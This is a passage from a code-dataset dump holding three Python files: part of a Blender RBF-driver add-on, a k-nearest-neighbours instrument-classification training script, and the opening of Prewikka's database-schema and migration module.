'SWING': {\n 'EULER' : quaternion_to_euler,\n 'SWING' : None,\n 'TWIST_X' : partial(quaternion_to_swing_twist_x, quaternion=True),\n 'TWIST_Y' : partial(quaternion_to_swing_twist_y, quaternion=True),\n 'TWIST_Z' : partial(quaternion_to_swing_twist_z, quaternion=True),\n 'QUATERNION': None,\n },\n 'TWIST_X': {\n 'EULER' : swing_twist_x_to_euler,\n 'SWING' : swing_twist_x_to_quaternion,\n 'TWIST_X' : None,\n 'TWIST_Y' : swing_twist_x_to_swing_twist_y,\n 'TWIST_Z' : swing_twist_x_to_swing_twist_z,\n 'QUATERNION': swing_twist_x_to_quaternion,\n },\n 'TWIST_Y': {\n 'EULER' : swing_twist_y_to_euler,\n 'SWING' : swing_twist_y_to_quaternion,\n 'TWIST_X' : swing_twist_y_to_swing_twist_x,\n 'TWIST_Y' : None,\n 'TWIST_Z' : swing_twist_y_to_swing_twist_z,\n 'QUATERNION': swing_twist_y_to_quaternion,\n },\n 'TWIST_Z': {\n 'EULER' : swing_twist_z_to_euler,\n 'SWING' : swing_twist_z_to_quaternion,\n 'TWIST_X' : swing_twist_z_to_swing_twist_x,\n 'TWIST_Y' : swing_twist_z_to_swing_twist_y,\n 'TWIST_Z' : None,\n 'QUATERNION': swing_twist_z_to_quaternion,\n },\n 'QUATERNION': {\n 'EULER' : quaternion_to_euler,\n 'SWING' : None,\n 'TWIST_X' : partial(quaternion_to_swing_twist_x, quaternion=True),\n 'TWIST_Y' : partial(quaternion_to_swing_twist_y, quaternion=True),\n 'TWIST_Z' : partial(quaternion_to_swing_twist_z, quaternion=True),\n 'QUATERNION': None,\n }\n }\n\nDRIVER_TYPE_ITEMS = [\n ('NONE' , \"Generic\" , \"\", 'DRIVER' , 0),\n ('SHAPE_KEY' , \"Shape Keys\", \"\", 'SHAPEKEY_DATA', 1),\n ]\n\nDRIVER_TYPE_INDEX = [\n item[0] for item in DRIVER_TYPE_ITEMS\n ]\n\nDRIVER_TYPE_TABLE = {\n item[0]: item[4] for item in DRIVER_TYPE_ITEMS\n }\n\nDRIVER_TYPE_ICONS = {\n item[0]: item[3] for item in DRIVER_TYPE_ITEMS\n }\n\n\n@dataclass(frozen=True)\nclass DriverNameUpdateEvent(Event):\n driver: 'RBFDriver'\n value: str\n\n\ndef driver_name_update_handler(driver: 'RBFDriver', _: 'Context') -> None:\n dispatch_event(DriverNameUpdateEvent(driver, driver.name))\n\n\ndef driver_symmetry_lock(driver: 'RBFDriver') -> bool:\n return driver.get(\"symmetry_lock\", False)\n\n\ndef driver_type(driver: 'RBFDriver') -> int:\n return driver.get(\"type\", 0)\n\n\nclass RBFDriver(Symmetrical, PropertyGroup):\n '''Radial basis function driver'''\n\n nodetree_internal__: PointerProperty(\n type=NodeTree,\n options={'HIDDEN'}\n )\n\n data_frame: PointerProperty(\n name=\"Data\",\n description=\"\",\n type=PoseDataFrame,\n options=set()\n )\n\n @property\n def icon(self) -> str:\n \"\"\"The RBF driver icon (read-only)\"\"\"\n return DRIVER_TYPE_ICONS[self.type]\n\n inputs: PointerProperty(\n name=\"Inputs\",\n description=\"Collection of RBF driver inputs\",\n type=Inputs,\n options=set()\n )\n\n outputs: PointerProperty(\n name=\"Outputs\",\n description=\"Collection of RBF driver outputs\",\n type=RBFDriverOutputs,\n options=set()\n )\n\n name: StringProperty(\n name=\"Name\",\n description=\"Unique RBF driver name\",\n options=set(),\n update=driver_name_update_handler,\n )\n\n poses: PointerProperty(\n name=\"Poses\",\n description=\"Collection of RBF driver poses\",\n type=Poses,\n options=set()\n )\n\n symmetry_lock: BoolProperty(\n name=\"Symmetry Lock\",\n description=\"Prevents symmetry property changes from infinite regression (internal-use)\",\n get=driver_symmetry_lock,\n options={'HIDDEN'}\n )\n\n type: EnumProperty(\n name=\"Type\",\n description=\"The RBF driver type (read-only)\",\n items=DRIVER_TYPE_ITEMS,\n get=driver_type,\n options=set()\n )\n\n def __init__(self, type: str, name: Optional[str]=\"\", mirror: 
Optional['RBFDriver']=None) -> None:\n assert mirror is None or (isinstance(mirror, RBFDriver)\n and mirror.id_data == self.id_data\n and mirror != self)\n\n self[\"type\"] = DRIVER_TYPE_TABLE[type]\n if name:\n self.name = name\n\n if mirror:\n self[\"symmetry_identifier\"] = mirror.identifier\n mirror[\"symmetry_identifier\"] = self.identifier\n\n def __repr__(self) -> str:\n return f'{self.__class__.__name__}(type=\"{self.type}\", name=\"{self.name}\")'\n\n def __str__(self) -> str:\n path: str = self.path_from_id()\n path = path.replace(\".internal__\", \"\")\n return f'{self.__class__.__name__} @ bpy.data.objects[\"{self.id_data.name}\"].{path}'\n\n\ndef input_target(input_: 'Input') -> Optional[Union['ID', 'PoseBone']]:\n target = input_.object\n if target:\n if (input_.type in {'LOCATION', 'ROTATION', 'SCALE'}\n and target.type == 'ARMATURE'\n and input_.bone_target):\n target = target.pose.bones.get(input_.bone_target)\n elif input_.id_type != 'OBJECT':\n target = target.data if target.type == input_.id_type else target.data\n return target\n\n\ndef read_input(input_: 'Input') -> Tuple[str, Optional[Union[float, Sequence[float]]]]:\n type_ = input_.type\n dtype = 'FLOAT'\n value = None\n if type_ in {'LOCATION', 'ROTATION', 'SCALE'}:\n if type_ == 'LOCATION':\n dtype = 'TRANSLATION'\n elif type_ == 'ROTATION':\n dtype = 'QUATERNION'\n else:\n dtype = 'SCALE'\n target = transform_target(input_, input_.bone_target)\n if target:\n matrix = transform_matrix(target, input_.transform_space)\n if type_ == 'LOCATION':\n dtype = 'TRANSLATION'\n value = matrix.to_translation()\n elif type_ == 'SCALE':\n dtype = type_\n value = matrix.to_scale()\n else:\n rmode = input_.rotation_mode\n dtype = 'QUATERNION'\n value = matrix.to_quaternion()\n if rmode == 'EULER':\n dtype = rmode\n value = value.to_euler(input_.rotation_order)\n elif rmode == 'AXIS_ANGLE':\n dtype = rmode\n value = value.to_axis_angle()\n\n return dtype, value\n
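\n# Illustrative sketch (not in the original file): on_pose_new below stores the\n# (dtype, value) pair that read_input returns for each driver input, roughly:\n#   dtype, value = read_input(input_)  # e.g. ('TRANSLATION', matrix.to_translation())\n#   pose.inputs.internal__.add().__init__(dtype, value)\n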
\n\n@event_handler(PoseNewEvent)\ndef on_pose_new(event: PoseNewEvent) -> None:\n pose = event.pose\n driver = pose.driver\n for input_ in driver.inputs:\n pose.inputs.internal__.add().__init__(*read_input(input_))\n for output in driver.outputs:\n pose.outputs.internal__.add().__init__(*read_output(output))\n\n\n@event_handler(InputRotationModeUpdateEvent)\ndef on_input_rotation_mode_update(event: InputRotationModeUpdateEvent) -> None:\n input_ = event.input\n if input_.type == 'ROTATION':\n prevmode = event.previous_value\n currmode = event.value\n if prevmode == 'TWIST': prevmode = f'TWIST_{input_.rotation_axis}'\n if currmode == 'TWIST': currmode = f'TWIST_{input_.rotation_axis}'\n prevtype = prevmode\n currtype = currmode\n if prevtype in {'SWING', 'TWIST'}: prevtype = f'SWING_TWIST_{input_.rotation_axis}'\n if currtype in {'SWING', 'TWIST'}: currtype = f'SWING_TWIST_{input_.rotation_axis}'\n convert = ROTATION_CONVERSION_LUT[prevmode][currmode]\n if convert:\n size = POSE_DATA_CONTAINER_TYPE_SIZES[prevtype]\n for pose in event.input.driver.poses:\n data = pose.inputs.get(event.input)\n if data and len(data) == size:\n data.__init__(currtype, convert(tuple(data)))\n\n\n@event_handler(InputRotationAxisUpdateEvent)\ndef on_input_rotation_axis_update(event: InputRotationAxisUpdateEvent) -> None:\n input_ = event.input\n if input_.type == 'ROTATION':\n mode = input_.rotation_mode\n if mode in {'SWING', 'TWIST'}:\n prev = f'{mode}_{event.previous_value}'\n curr = f'{mode}_{event.value}'\n convert = ROTATION_CONVERSION_LUT[prev][curr]\n if convert:\n type_ = f'SWING_TWIST_{event.value}'\n for pose in input_.driver.poses:\n data = pose.inputs.get(input_)\n if data and len(data) == 4:\n data.__init__(type_, convert(tuple(data)))","repo_name":"jamesvsnowden/bl_rbf_drivers","sub_path":"rbf_drivers/api/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":10393,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}
+{"seq_id":"29545525450","text":"# DSP - Training Module\n\nimport librosa\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pa\nimport time\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split #remove later\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import mean_squared_error\nimport feature_extraction as fe\n\n# Hyperparameter variables go here\nk = -1 #k no. of neighbours. Variables set to -1 have not yet been initialised\nk_lim = 20\nleaf_size = -1 #Leaf size for model\nl_lim = 30\np = -1 #Distance measurement \"p\"\n\ntic = time.perf_counter() #Start timer for feature extraction\n\n# Real data for X and y\npath = \"samples_large\" #Directory for training data\npathtest = \"testdata\" #Directory for \"test data\" (will be split into validate and test)\ny_train = fe.read_instruments(path)\nX_train = [fe.get_features(filename) for filename in fe.get_wav_files(path)]\nprint(\"Training data loaded in.\")\n\n# Data collection\ny_vali = fe.read_instruments(pathtest)\nX_vali = [fe.get_features(filename) for filename in fe.get_wav_files(pathtest)]\nprint(\"Validation data loaded in.\")\n\n#X_train, X_test, y_train, y_test = train_test_split(X_train, y_train, test_size=0.20)\n#X_train, X_vali, y_train, y_vali = train_test_split(X_train, y_train, test_size=0.25)\n# This block of code is used when the training data is too small to warrant use of full test set\n# In this case we instead partition the training set 60/20/20\n\nX_vali, X_test, y_vali, y_test = train_test_split(X_vali, y_vali, test_size=0.30) #Split validation/test 70/30\nprint(\"Test data loaded in.\")\nscaler = StandardScaler() #Perform some scaling on the data\n# Note: Does not affect accuracy but its good practice so its been left in\nscaler.fit(X_train)\nX_train = scaler.transform(X_train)\nX_vali = scaler.transform(X_vali)\nX_test = scaler.transform(X_test)\nprint(\"X_train: \", len(X_train), \"\\nX_vali: \", len(X_vali), \"\\nX_test: \", len(X_test))\ntoc = time.perf_counter()\ntime_data = round((toc-tic),4) #Record feature extraction (and data partitioning time)\n# Effectively the \"time taken to prepare data\"\n\ntic = time.perf_counter() #Start training clock\n#Validation cycle (k)\naccuracy_k = []\naccMax = 0\nfor i in range (1, k_lim):\n kmeans = KNeighborsClassifier(n_neighbors=i) #Set up a model for given k\n kmeans.fit(X_train, y_train)\n y_pred = kmeans.predict(X_vali) #Predict using validation set\n accTemp = (np.sum(y_pred == y_vali)/len(y_vali))*100 #Accuracy is correct guesses/total\n if(accTemp > accMax): #If this is the highest accuracy noted, update the optimal k value (used later)\n k = i\n accMax = accTemp #Update max\n accuracy_k.append(round(accTemp,2)) #Track accuracy history\n
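\n# Illustrative alternative (not used by this script): the three manual validation\n# loops could be collapsed into the GridSearchCV that is already imported above;\n# a minimal sketch, assuming the same X_train/y_train as prepared earlier:\n# param_grid = {'n_neighbors': range(1, k_lim), 'leaf_size': range(1, l_lim), 'p': [1, 2]}\n# search = GridSearchCV(KNeighborsClassifier(), param_grid, cv=5)\n# search.fit(X_train, y_train)\n# print(search.best_params_) #Best k, leaf_size and p found by cross-validation\n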
\n#Validation cycle (leaves)\naccuracy_l = []\naccMax = 0\nfor i in range (1, l_lim):\n kmeans = KNeighborsClassifier(n_neighbors=k, leaf_size=i) #uses optimal k value so we can iterate on progress already made\n kmeans.fit(X_train, y_train)\n y_pred = kmeans.predict(X_vali) #Same as before. Test for each leaf_size limit\n accTemp = (np.sum(y_pred == y_vali)/len(y_vali))*100\n if(accTemp > accMax):\n leaf_size = i\n accMax = accTemp\n accuracy_l.append(round(accTemp,2)) #Track leaf_size accuracy\n\n#Validation cycle (p)\naccuracy_p = []\n# Only looking at two types of distance measurement so no need for a loop\nkmeans = KNeighborsClassifier(n_neighbors=k, leaf_size=leaf_size, p=1)\n# p=1 -> Manhattan\nkmeans.fit(X_train, y_train)\ny_pred = kmeans.predict(X_vali)\nacc1 = (np.sum(y_pred == y_vali)/len(y_vali))*100\naccuracy_p.append(round(acc1, 2))\nkmeans = KNeighborsClassifier(n_neighbors=k, leaf_size=leaf_size, p=2)\n# p=2 -> Euclidean\nkmeans.fit(X_train, y_train)\ny_pred = kmeans.predict(X_vali)\nacc2 = (np.sum(y_pred == y_vali)/len(y_vali))*100\naccuracy_p.append(round(acc2, 2))\nif (acc1 > acc2): #Find which value gave superior accuracy\n p = 1\nelse:\n p = 2\nif (acc1 == acc2):\n print(\"Distance method was inconsequential\") #Note if this didn't matter\n\n#Analysis based on optimised hyperparameters\nprint(\"Fully trained. Selected hyperparameters:\\nk: \", k, \"\\nLeaf size: \", leaf_size, \"\\nMeasurement distance: \", end='')\nif (p == 1):\n print(\"Manhattan\")\nelif (p == 2):\n print(\"Euclidean\")\nelse:\n print (\"Error: unknown distance setting\")\nknn = KNeighborsClassifier(n_neighbors=k, leaf_size=leaf_size, p=p) #Assemble final optimal model\nknn.fit(X_train, y_train)\ntoc = time.perf_counter()\ntime_train = round((toc-tic),4) #Stop training timer. We have the final model.\ntic = time.perf_counter() #Start testing timer\ny_pred = knn.predict(X_test) #Now we can test using the test set (rather than validation)\ntoc = time.perf_counter()\ntime_test = round((toc-tic),4) #Record testing time\n\n# Results display\nprint(\"\\nFully tested. Displaying results:\")\n# Plot accuracy results for various k values\nplt.figure(figsize=(6, 6))\nplt.plot(range(1, k_lim), accuracy_k, color='blue', linestyle='dashed', marker='o',\n markerfacecolor='blue', markersize=10)\nplt.title('Accuracy per K value')\nplt.xlabel('K Value')\nplt.ylabel('Tested Accuracy')\nplt.show()\n# Plot accuracy results for various leaf sizes\nplt.figure(figsize=(6, 6))\nplt.plot(range(1, l_lim), accuracy_l, color='blue', linestyle='dashed', marker='o',\n markerfacecolor='blue', markersize=10)\nplt.title('Accuracy for given leaf size')\nplt.xlabel('Leaf size n')\nplt.ylabel('Tested Accuracy')\nplt.show()\n\n# Measurement Reports\n# Print out distance measurement comparison. Only two values so no need for plot\nprint(\"Distance comparison: \", \"Manhattan(\", accuracy_p[0], \"%) | Euclidean: (\", accuracy_p[1], \"%)\")\n# SKLearn classification report\nprint(classification_report(y_test, y_pred))\n
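# Optional extra check (illustrative; confusion_matrix is already imported above):\n# print(confusion_matrix(y_test, y_pred)) #Rows are true classes, columns are predictions\n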
# Time outputs\nprint(\"Data collection time: \", time_data, \"s\")\nprint(\"Training time: \", time_train, \"s\")\nprint(\"Testing time: \", time_test, \"s\")\n\n# Plot a pie chart showing ratio of feature extraction time vs. training time.\n# Testing time omitted after it was found to be completely negligible compared to the other two\npie_labels = 'Feature extraction', 'Training'#, 'Testing'\ntime_sum = time_data+time_train\npie_vals = [time_data/time_sum, time_train/time_sum]\nfig1, ax1 = plt.subplots()\nax1.pie(pie_vals, labels=pie_labels, startangle=90)\nax1.axis('equal')\nplt.show()\n\n# KNN algorithm finish","repo_name":"DJoska/DSP_Project","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"8373797151","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport abc\nimport collections\nimport fcntl\nimport functools\nimport operator\nimport pkgutil\nimport re\nimport time\nfrom datetime import datetime\n\nimport pkg_resources\nimport preludedb\nfrom prewikka import compat, error, log, utils, version\nfrom prewikka.utils import cache\n\n\nNotNone = object\nModuleInfo = collections.namedtuple(\"ModuleInfo\", [\"branch\", \"version\", \"enabled\"])\n\n\nclass DatabaseError(error.PrewikkaUserError):\n name = N_(\"Database error\")\n\n def __init__(self, message, **kwargs):\n error.PrewikkaUserError.__init__(self, message=message, **kwargs)\n\n\nclass DatabaseSchemaError(DatabaseError):\n name = N_(\"Database schema error\")\n\n\n# Internal workaround since SWIG-generated exceptions use class RuntimeError\ndef _fix_exception(func):\n def inner(self, *args, **kwargs):\n try:\n ret = func(self, *args, **kwargs)\n except RuntimeError as e:\n raise DatabaseError(message=text_type(e))\n\n return ret\n return inner\n\n\ndef _use_flock(func):\n\n def inner(self, *args, **kwargs):\n fd = open(__file__, 'r')\n\n fcntl.flock(fd, fcntl.LOCK_EX)\n try:\n ret = func(self, *args, **kwargs)\n finally:\n fcntl.flock(fd, fcntl.LOCK_UN)\n\n return ret\n\n return inner\n\n\ndef use_transaction(func):\n @functools.wraps(func)\n def inner(self, *args, **kwargs):\n db = getattr(self, \"__db\", env.db)\n\n if db._transaction_state:\n return func(self, *args, **kwargs)\n\n db.transaction_start()\n try:\n ret = func(self, *args, **kwargs)\n except:\n db.transaction_abort()\n raise\n\n db.transaction_end()\n return ret\n\n return inner\n\n\ndef use_lock(table):\n def real_decorator(func):\n\n @use_transaction\n def inner(self, *args, **kwargs):\n db = getattr(self, \"__db\", env.db)\n\n db._lock_table(table)\n\n try:\n ret = func(self, *args, **kwargs)\n except:\n db._unlock_table(table)\n raise\n\n db._unlock_table(table)\n return ret\n\n return inner\n\n return real_decorator\n\n\nclass SQLScript(object):\n \"\"\"This is the main class describing an SQL script (install / update / branch migration)\n\n ::type:: Describes the kind of database script : \"branch\", \"update\", \"install\"\n ::version:: Version the database is going to use after successful insertion of the script\n ::branch:: Optional name of the branch this script applies to\n ::from_branch:: Optional, the script only applies if the current (branch, version) is the one specified\n\n type = \"branch\" from_branch=(\"branch\", \"version\") branch=\"B\" version=\"target\"\n type = \"update\" version=\"target\" optional=[branch]\n type = \"install\" version=\"target\" optional=[branch]\n\n \"\"\"\n
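\n # Illustrative example (hypothetical table name, following the docstring above):\n # update scripts discovered through the 'prewikka.updatedb' entry point subclass\n # SQLScript roughly as follows:\n # class SQLUpdate(SQLScript):\n #     type = 'update'\n #     version = '1.1'\n #\n #     def run(self):\n #         self.query('ALTER TABLE Example ADD COLUMN note TEXT;')\n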
\n __metaclass__ = abc.ABCMeta\n __all__ = [\"type\", \"branch\", \"version\", \"from_branch\"]\n\n type = \"update\"\n branch = None\n version = None\n from_branch = None\n\n def __init__(self, dbup):\n self.db = dbup\n self.query_logs = []\n self._module_name = dbup._module_name\n self._full_module_name = dbup._full_module_name\n self._query_filter = {\"sqlite3\": self._mysql2sqlite,\n \"pgsql\": self._mysql2pgsql,\n \"mysql\": self._mysqlhandler}[self.db.get_type()]\n\n if self.type in (\"install\", \"update\"):\n if not self.version:\n raise Exception(\"SQL %s script requires a 'version' attribute\" % self.type)\n\n elif self.type == \"branch\":\n if not all(getattr(self, i) for i in (\"from_branch\", \"branch\", \"version\")):\n raise Exception(\"SQL branch script requires 'from_branch', 'branch', and 'version' attributes\")\n\n @staticmethod\n def _sub(_stbl, input):\n for i in _stbl:\n input = re.sub(i[0], i[1], input)\n\n return input\n\n def _mysql2pgsql(self, input):\n _stbl = [\n (\"#.*\", \"\"),\n (\" INT UNSIGNED NOT NULL PRIMARY KEY AUTO_INCREMENT\", \" SERIAL PRIMARY KEY\"),\n (\"BIGINT UNSIGNED NOT NULL PRIMARY KEY AUTO_INCREMENT\", \"BIGSERIAL PRIMARY KEY\"),\n (\"BLOB\", \"BYTEA\"),\n (\" TINYINT UNSIGNED \", \" INT4 \"),\n (\" TINYINT \", \" INT2 \"),\n (\" SMALLINT UNSIGNED \", \" INT8 \"),\n (\" SMALLINT \", \" INT4 \"),\n (\" BIGINT UNSIGNED \", \" INT8 \"),\n (\" BIGINT \", \" INT8 \"),\n (\" INT(EGER)? UNSIGNED \", \" INT8 \"),\n (\" INT(EGER)? \", \" INT4 \"),\n (\"DATETIME\", \"TIMESTAMP\"),\n (\"ENGINE=InnoDB\", \"\"),\n (\"\\\"([^\\\"]*)\\\"\", \"'\\\\1'\"),\n (\"\\\"\\([^\\\"]*\\)\\\"\", \"'\\1'\"),\n (\"(\\S*) ENUM\\((.*)\\)\", \"\\\\1 TEXT CHECK (\\\\1 IN (\\\\2))\"),\n (\"VARCHAR[ ]*[^)]+\\)\", \"TEXT\"),\n (\"(DROP INDEX [^ ]*) ON [^;]*\", \"\\\\1\")\n ]\n\n return self._sub(_stbl, input)\n\n def _mysql2sqlite(self, input):\n _stbl = [\n (\"#.*\", \"\"),\n (\"[a-zA-Z]*INT \", \"INTEGER \"),\n (\"UNSIGNED \", \"\"),\n (\"ENUM[ ]*[^)]+\\)\", \"TEXT\"),\n (\"VARCHAR[ ]*[^)]+\\)\", \"TEXT\"),\n (\"AUTO_INCREMENT\", \"AUTOINCREMENT\"),\n (\"ENGINE=InnoDB\", \"\"),\n (\"ALTER TABLE [^ ]* DROP.*\", \"\"),\n (\"(DROP INDEX [^ ]*) ON [^;]*\", \"\\\\1\")\n ]\n\n return self._sub(_stbl, input)\n\n def _mysqlhandler(self, input):\n return input\n\n def query(self, input):\n for q in self._query_filter(input).split(\";\"):\n q = q.strip()\n if q:\n self.query_logs.append(q)\n self.db.query(q)\n\n @abc.abstractmethod\n def run(self):\n pass\n\n @use_transaction\n def apply(self):\n log.get_logger().info(\"%s: please stand by while %s is applied\", self._full_module_name, text_type(self))\n\n self.run()\n\n if self.type == \"install\":\n self.db.upsert(\n \"Prewikka_Module_Registry\",\n (\"module\", \"branch\", \"version\"),\n ((self._full_module_name, self.branch, self.version),),\n pkey=(\"module\",)\n )\n\n elif self.type == \"update\":\n self.db.query(\"UPDATE Prewikka_Module_Registry SET version=%s WHERE module=%s%s\" %\n (self.db.escape(self.version),\n self.db.escape(self._full_module_name),\n self.db._chknull(\"branch\", self.branch)))\n\n elif self.type == \"branch\":\n self.db.query(\"UPDATE Prewikka_Module_Registry SET branch=%s, version=%s, enabled=1 WHERE module=%s\",\n self.branch, self.version, self._full_module_name)\n\n self.db._update_state(self.version, self.branch)\n\n def get_version_string(self):\n if not self.branch:\n return self.version\n else:\n return \"%s[%s]\" % (self.branch, self.version)\n\n def __str__(self):\n return \"%s:%s\" % (self.type, self.get_version_string())\n\n def __eq__(self, other):\n return all(getattr(self, i) == getattr(other, i) for i in self.__all__)\n\n\nclass DatabaseHelper(object):\n def __getattr__(self, x):\n return 
self.__dict__.get(x, getattr(env.db, x))\n\n\nclass DatabaseUpdateHelper(DatabaseHelper):\n def __init__(self, module_name, reqversion, reqbranch=None, enabled=True):\n self._reqbranch = reqbranch\n self._reqversion = reqversion\n self._module_name = module_name.split(\":\")[0]\n self._full_module_name = module_name\n self._default_modinfo = ModuleInfo(None, None, enabled)\n self._initialized = False\n\n def _init_version_attr(self):\n if self._initialized:\n return\n\n module = env.db.modinfos.get(self._full_module_name, self._default_modinfo)\n\n self._from_branch = module.branch\n self._from_version = module.version\n self._need_enable = not(module.enabled)\n self._initialized = True\n\n def check(self):\n self._init_version_attr()\n\n if not self._from_version and self._reqversion:\n raise DatabaseSchemaError(N_(\"database installation required\"))\n\n if self._need_enable:\n raise DatabaseSchemaError(N_(\"database activation required\"))\n\n if self._reqbranch and self._from_branch != self._reqbranch:\n raise DatabaseSchemaError(N_(\"database schema branch %(required)s required (found %(current)s)\",\n {'required': self._reqbranch, 'current': self._from_branch}))\n\n if self._reqversion and self._from_version != self._reqversion:\n raise DatabaseSchemaError(N_(\"database schema version %(required)s required (found %(current)s)\",\n {'required': self._get_version_string(self._reqbranch, self._reqversion),\n 'current': self._get_version_string(self._from_branch, self._from_version)}))\n\n def _update_state(self, version, branch):\n self._from_branch = branch\n self._from_version = version\n\n def _get_update_directories(self):\n for i in pkg_resources.iter_entry_points(\"prewikka.updatedb\", self._module_name):\n try:\n yield i.load().__path__[0]\n except Exception as e:\n log.get_logger().exception(\"[%s]: error loading SQL updates: %s\", self._full_module_name, e)\n\n def _get_schema_list(self, **kwargs):\n from_version = to_version = None\n\n if \"from_version\" in kwargs:\n from_version = pkg_resources.parse_version(kwargs.pop(\"from_version\"))\n\n if \"to_version\" in kwargs:\n to_version = pkg_resources.parse_version(kwargs.pop(\"to_version\"))\n\n dirnames = self._get_update_directories()\n\n for importer, package_name, _ in pkgutil.iter_modules(dirnames):\n try:\n mod = importer.find_module(package_name).load_module(package_name).SQLUpdate(self)\n except Exception as e:\n log.get_logger().exception(\"[%s]: error loading SQL update '%s' : %s\" %\n (self._full_module_name, package_name, e))\n continue\n\n if any(kwargs[k] != getattr(mod, k) for k in kwargs.keys()):\n continue\n\n version = pkg_resources.parse_version(mod.version)\n if (not from_version or (version > from_version)) and (not to_version or (version <= to_version)):\n yield mod\n\n def _resolve_branch_switch(self, curbranch, curversion, outstack=[]):\n for upd in self._list(from_branch=(curbranch, curversion), type=\"branch\"):\n if upd.branch == self._reqbranch and pkg_resources.parse_version(upd.version) <= pkg_resources.parse_version(self._reqversion):\n return outstack + [upd]\n\n elif upd in outstack:\n log.get_logger().warning(\"cyclic branch dependencies detected: %s\", \" -> \".join(text_type(i) for i in outstack + [upd]))\n continue\n\n else:\n ret = self._resolve_branch_switch(upd.branch, upd.version, outstack=outstack[:] + [upd])\n if ret:\n return ret\n\n for upd in self._list(from_version=curversion, branch=curbranch, type=\"update\"):\n ret = self._resolve_branch_switch(upd.branch, upd.version, 
outstack=outstack[:] + [upd])\n if ret:\n return ret\n\n return []\n\n def _list(self, *args, **kwargs):\n fv = self._get_schema_list(*args, **kwargs)\n return sorted(fv, key=operator.attrgetter(\"version\"))\n\n def _get_install_schema(self):\n ret = self._list(to_version=self._reqversion, branch=self._reqbranch, type=\"install\")\n if not ret:\n raise error.PrewikkaUserError(N_(\"Database installation error\"),\n N_(\"No database installation script found for module %(module)s, version %(version)s\",\n {'module': self._full_module_name, 'version': self._get_version_string(self._reqbranch, self._reqversion)}))\n\n return ret[-1]\n\n def _get_branch_update(self):\n prev = self._resolve_branch_switch(self._from_branch, self._from_version)\n if not prev:\n raise error.PrewikkaUserError(\n N_(\"Database migration error\"),\n N_(\"No database branch migration script found for module %(module)s, branch transition %(current)s -> %(required)s\",\n {'module': self._full_module_name,\n 'current': self._get_version_string(self._from_branch, self._from_version),\n 'required': self._get_version_string(self._reqbranch, \"<=\" + self._reqversion)})\n )\n\n return prev\n\n @staticmethod\n def _get_version_string(branch, version):\n if not branch:\n return version\n else:\n return \"%s[%s]\" % (branch, version)\n\n def list(self):\n if not self._reqversion:\n return []\n\n self._init_version_attr()\n from_version, prev = self._from_version, []\n\n if not from_version:\n prev = [self._get_install_schema()]\n\n elif self._from_branch != self._reqbranch:\n prev = self._get_branch_update()\n\n if prev:\n from_version = prev[-1].version\n\n if from_version == self._reqversion:\n return prev\n\n ret = self._list(from_version=from_version, to_version=self._reqversion, branch=self._reqbranch, type=\"update\")\n if not(ret) or ret[-1].version != self._reqversion:\n raise error.PrewikkaUserError(\n N_(\"Database migration error\"),\n N_(\"No linear migration script found for module %(module)s %(version1)s -> %(version2)s\",\n {'module': self._full_module_name,\n 'version1': self._get_version_string(self._from_branch, self._from_version),\n 'version2': self._get_version_string(self._reqbranch, self._reqversion)})\n )\n\n return prev + ret\n\n @use_transaction\n def _apply(self):\n [update.apply() for update in self.list()]\n self.check()\n\n @_use_flock\n def apply(self):\n # We call _init_version_attr() outside the transaction because it fails\n # when the tables do not exist (eg. 
during database initialization)\n # and we don't want the whole transaction to be rolled back.\n self._init_version_attr()\n self._apply()\n\n def get_schema_version(self):\n self._init_version_attr()\n return self._from_version\n\n\nclass DatabaseCommon(object):\n required_branch = version.__branch__\n required_version = \"0\"\n\n NotNone = NotNone\n __sentinel = object()\n\n __TRANSACTION_STATE_NONE = 0\n __TRANSACTION_STATE_BEGIN = 1\n __TRANSACTION_STATE_QUERY = 2\n\n @_fix_exception\n def __init__(self, settings):\n self.__ESCAPE_PREFILTER = {\n bool: int,\n datetime: lambda dt: self.escape(self.datetime(dt)),\n \"iterable\": self._prefilter_iterate,\n }\n\n self._transaction_state = self.__TRANSACTION_STATE_NONE\n\n stpl = tuple((k, v) for k, v in settings.items())\n self._db = preludedb.SQL(settings)\n\n self._version = self._db.getServerVersion()\n self._dbhash = hash(stpl)\n self._dbtype = settings[\"type\"]\n\n def _get_prefilter(self, v):\n if not(isinstance(v, (text_type, bytes))) and isinstance(v, collections.Iterable):\n return self.__ESCAPE_PREFILTER[\"iterable\"]\n else:\n return self.__ESCAPE_PREFILTER.get(type(v))\n\n def _prefilter_iterate(self, l):\n tmp = []\n for v in l:\n tmp.append(text_type(self.escape(v)))\n\n if self._get_prefilter(v) == self._prefilter_iterate:\n fmt = '%s'\n else:\n fmt = '(%s)'\n\n return fmt % ', '.join(tmp)\n\n @staticmethod\n def parse_datetime(date):\n if \".\" in date:\n fmt = \"%Y-%m-%d %H:%M:%S.%f\"\n else:\n fmt = \"%Y-%m-%d %H:%M:%S\"\n\n return datetime.strptime(date, fmt).replace(tzinfo=utils.timeutil.timezone(\"UTC\"))\n\n @staticmethod\n def datetime(t):\n if t is None:\n return None\n\n if isinstance(t, datetime):\n # Only timezone-aware datetimes are accepted\n return t.astimezone(utils.timeutil.timezone(\"UTC\")).strftime(\"%Y-%m-%d %H:%M:%S.%f\")\n else:\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(t))\n\n def kwargs2query(self, kwargs, prefix=\"\"):\n if not kwargs:\n return \"\"\n\n qs = []\n for field, val in kwargs.items():\n if not val:\n qs.append(\"%s IS NULL\" % (field))\n\n elif val is NotNone:\n qs.append(\"%s IS NOT NULL\" % (field))\n\n else:\n op = \"=\"\n if isinstance(val, (list, tuple)):\n op = \"IN\"\n\n elif isinstance(val, bool):\n val = int(val)\n\n qs.append(\"%s %s %s\" % (field, op, self.escape(val)))\n\n return prefix + \" AND \".join(qs)\n\n def query(self, sql, *args, **kwargs):\n if self._transaction_state == self.__TRANSACTION_STATE_BEGIN:\n self._db.transactionStart()\n self._transaction_state = self.__TRANSACTION_STATE_QUERY\n\n if args:\n sql = sql % tuple(self.escape(value) for value in args)\n elif 